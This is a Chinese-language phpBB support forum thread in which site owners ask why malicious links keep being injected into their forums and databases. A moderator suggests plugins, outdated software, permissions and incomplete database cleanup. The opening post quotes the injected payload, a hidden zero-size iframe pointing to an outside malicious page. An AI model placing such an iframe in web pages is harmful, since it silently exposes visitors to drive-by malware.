[問題] 請教各位前輩,關於被放了木馬...

phpBB Installation & Usage Support
phpBB 2 安裝於各類型作業平台之問題討論;外掛問題,請到相關版面依發問格式發表!
(發表文章請按照公告格式發表,違者砍文)

版主: 版主管理群

版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
阿維
竹貓忠實會員
竹貓忠實會員
文章: 868
註冊時間: 2003-02-23 13:36
來自: 台南市

文章 阿維 »

我現在只想要問的是下面這段病毒碼是怎麼搞出來的?
依照我觀察的結果是PHP程式幾乎都受到波及,不是只有phpBB受害而已\r
假如是從沒有更新phpBB 2.0.x後續安全性修正來切入的話\r
我週遭還是有更新完被植入的案例,你們覺得到底是哪個環節出問題呢?

代碼: 選擇全部

<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

裝外掛才會被入侵,有個風格外掛害的=_=!!
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
阿維
竹貓忠實會員
竹貓忠實會員
文章: 868
註冊時間: 2003-02-23 13:36
來自: 台南市

文章 阿維 »

可是我知道的那個網站沒有安裝風格外掛耶\r
而且他中標的時候是在更新完phpBB 2.0.15沒多久的事情 (當時是同步更新的)
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

JORDAN 寫:可是我知道的那個網站沒有安裝風格外掛耶\r
而且他中標的時候是在更新完phpBB 2.0.15沒多久的事情 (當時是同步更新的)
PHP MYSQL 版本沒更新也會出事呀!
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
阿維
竹貓忠實會員
竹貓忠實會員
文章: 868
註冊時間: 2003-02-23 13:36
來自: 台南市

文章 阿維 »

那可以請問你主機目前安裝的相關套件版本編號可以告訴我嗎?
因為這樣我才好要求我朋友的主機商立即更新相關套件避免入侵
sulien
星球普通子民
星球普通子民
文章: 28
註冊時間: 2003-06-11 15:13

文章 sulien »

PHP MYSQL 4.0.24-standard
PHP 版本 4.3.11
phpbb2.0.16版

為什麼還是被植入病毒連結?

請教各位
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

跟下面的一樣\r
JORDAN 寫:那可以請問你主機目前安裝的相關套件版本編號可以告訴我嗎?
因為這樣我才好要求我朋友的主機商立即更新相關套件避免入侵
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

有安裝外掛?資料夾屬性都是 755 ?
sulien 寫:PHP MYSQL 4.0.24-standard
PHP 版本 4.3.11
phpbb2.0.16版

為什麼還是被植入病毒連結?

請教各位
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
阿維
竹貓忠實會員
竹貓忠實會員
文章: 868
註冊時間: 2003-02-23 13:36
來自: 台南市

文章 阿維 »

我想我們的環境都是一樣的吧 (除了有人忘記將config.php改回644之外)
還有我最近有聽說另外一個說法,有人說是被人盜用系統管理員帳號手動執行的 (該系統為vBB有管理記錄)
luke0121
星球普通子民
星球普通子民
文章: 2
註冊時間: 2005-03-28 13:32

文章 luke0121 »

作業系統 Linux
PHP 版本 4.3.10
MySQL 版本 4.0.24-standard
phpBB 版本 2.0.16

三天兩頭就中一次,翻遍了論壇,還是找不到治根的解決辦法。

看來看去這是主機方的問題嗎?
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

有沒有可以參考了連結?你要檢查一下你資料庫裡面有沒有不應該出現的資料,因為你可能沒有清乾淨,還有你到底有沒有裝外掛?

luke0121 寫:作業系統 Linux
PHP 版本 4.3.10
MySQL 版本 4.0.24-standard
phpBB 版本 2.0.16

三天兩頭就中一次,翻遍了論壇,還是找不到治根的解決辦法。

看來看去這是主機方的問題嗎?
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
sulien
星球普通子民
星球普通子民
文章: 28
註冊時間: 2003-06-11 15:13

[問題] 想改成755卻又自動恢復成777

文章 sulien »

小竹子 寫:有安裝外掛?資料夾屬性都是 755 ?
sulien 寫:PHP MYSQL 4.0.24-standard
PHP 版本 4.3.11
phpbb2.0.16版

為什麼還是被植入病毒連結?

請教各位
謝謝小竹子。

我沒裝外掛。
我在千微公司主機商的控制台看資料夾屬性都是 755,
其控制台參考模式:http://linux.dollarhosts.com.tw/demo/rvskin/
但在CuteFTP看, 有一資料夾是777,想改成755卻又自動恢復成777。

我有請教主機商,得到的回覆是:
「此資料夾是與public_html同步的, 由cpanel控制, 所以請勿任意變更
否則cpanel系統可能會出現無法讀取你的網頁」

想請教,
為什麼在用CuteFTP時,不能將那一個資料夾改為755呢?

謝謝。

我的論壇:http://www.taiwanpoetry.com/forum/index.php
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

CPanel 預設根目錄是 public_html 沒有錯呀!那個不需要動他。
沒看到有被入侵的痕跡,你要檢查你的資料庫看是不是有清乾淨
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
sulien
星球普通子民
星球普通子民
文章: 28
註冊時間: 2003-06-11 15:13

文章 sulien »

小竹子 寫:CPanel 預設根目錄是 public_html 沒有錯呀!那個不需要動他。
沒看到有被入侵的痕跡,你要檢查你的資料庫看是不是有清乾淨
謝謝這麼快的答覆,感激。

半小時前是在 phpMyAdmin的 phpbb_forums刪了那植入的病毒連結,所以看起來沒有被入侵的痕跡,但過幾天又被植入,刪之甚煩。

請教要如何清乾淨資料庫?我不知方法?若是問得很不得體,請諒。
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

有安裝過任何外掛嗎?我問了很多次了,你都沒回答我過
sulien 寫:
小竹子 寫:CPanel 預設根目錄是 public_html 沒有錯呀!那個不需要動他。
沒看到有被入侵的痕跡,你要檢查你的資料庫看是不是有清乾淨
謝謝這麼快的答覆,感激。

半小時前是在 phpMyAdmin的 phpbb_forums刪了那植入的病毒連結,所以看起來沒有被入侵的痕跡,但過幾天又被植入,刪之甚煩。

請教要如何清乾淨資料庫?我不知方法?若是問得很不得體,請諒。
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
主題已鎖定

回到「phpBB 2 安裝與使用」